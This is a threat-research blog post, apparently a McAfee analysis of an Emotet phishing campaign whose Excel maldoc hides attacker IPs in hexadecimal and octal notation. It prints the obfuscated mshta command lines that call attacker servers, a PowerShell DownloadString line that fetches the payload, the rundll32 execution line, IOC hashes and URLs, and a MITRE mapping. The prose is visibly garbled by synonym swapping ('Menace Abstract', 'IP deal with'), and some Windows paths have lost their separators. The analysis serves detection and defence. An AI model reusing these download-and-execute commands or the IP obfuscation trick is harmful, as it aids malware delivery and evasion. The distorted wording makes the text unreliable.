Authored By: Kiran Raj
In a current marketing campaign of Emotet, McAfee Researchers noticed a change in methods. The Emotet maldoc was utilizing hexadecimal and octal codecs to symbolize IP deal with which is often represented by decimal codecs. An instance of that is proven under:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 185.7.214.7
This variation in format would possibly evade some AV merchandise counting on command line parameters however McAfee was nonetheless in a position to shield our prospects. This weblog explains this new approach.
Menace Abstract
- The preliminary assault vector is a phishing e mail with a Microsoft Excel attachment.
- Upon opening the Excel doc and enabling modifying, Excel executes a malicious JavaScript from a server by way of mshta.exe
- The malicious JavaScript additional invokes PowerShell to obtain the Emotet payload.
- The downloaded Emotet payload might be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.
Maldoc Evaluation
Under is the picture (determine 2) of the preliminary worksheet opened in excel. We are able to see some hidden worksheets and a social engineering message asking customers to allow content material. By enabling content material, the person permits the malicious code to run.
On analyzing the excel spreadsheet additional, we are able to see a number of cell addresses added within the Named Supervisor window. Cells talked about within the Auto_Open worth might be executed mechanically leading to malicious code execution.
Under are the instructions utilized in Hexadecimal and Octal variants of the Maldocs
| FORMAT | OBFUSCATED CMD | DEOBFUSCATED CMD |
| Hexadecimal | cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html | http://185[.]7[.]214[.]7/fer/fer.html |
| Octal | cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html | http://46[.]105[.]81[.]76/c.html |
Execution
On executing the Excel spreadsheet, it invokes mshta to obtain and run the malicious JavaScript which is inside an html file.
The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code
The Malicious JavaScript invokes PowerShell to obtain the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the next path “C:UsersPublicDocumentsssd.dll”.
| cmd line | (New-Object Internet.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’) |
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server
| cmd line | cmd /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString |
IOC
| TYPE | VALUE | SCANNER | DETECTION NAME |
| XLS | 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c | McAfee LiveSafe and Whole Safety | X97M/Downloader.nn |
| DLL | a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 | McAfee LiveSafe and Whole Safety
|
Emotet-FSY |
| HTML URL | http://185[.]7[.]214[.]7/fer/fer.html
http://46[.]105[.]81[.]76/c.html |
WebAdvisor | Blocked |
| DLL URL | http://185[.]7[.]214[.]7/fer/fer.png
http://46[.]105[.]81[.]76/cc.png |
WebAdvisor | Blocked |
MITRE ATT&CK
| TECHNIQUE ID | TACTIC | TECHNIQUE DETAILS | DESCRIPTION |
| T1566 | Preliminary entry | Phishing attachment | Preliminary maldoc makes use of phishing strings to persuade customers to open the maldoc |
| T1204 | Execution | Person Execution | Handbook execution by person |
| T1071 | Command and Management | Normal Utility Layer Protocol | Makes an attempt to attach by HTTP |
| T1059 | Command and Scripting Interpreter | Begins CMD.EXE for instructions execution | Excel makes use of cmd and PowerShell to execute command |
| T1218
|
Signed Binary Proxy Execution | Makes use of RUNDLL32.EXE and MSHTA.EXE to load library | rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript |
Conclusion
Workplace paperwork have been used as an assault vector for a lot of malware households in current instances. The Menace Actors behind these households are continuously altering their methods with the intention to try to evade detection. McAfee Researchers are continuously monitoring the Menace Panorama to determine these adjustments in methods to make sure our prospects keep protected and may go about their day by day lives with out having to fret about these threats.
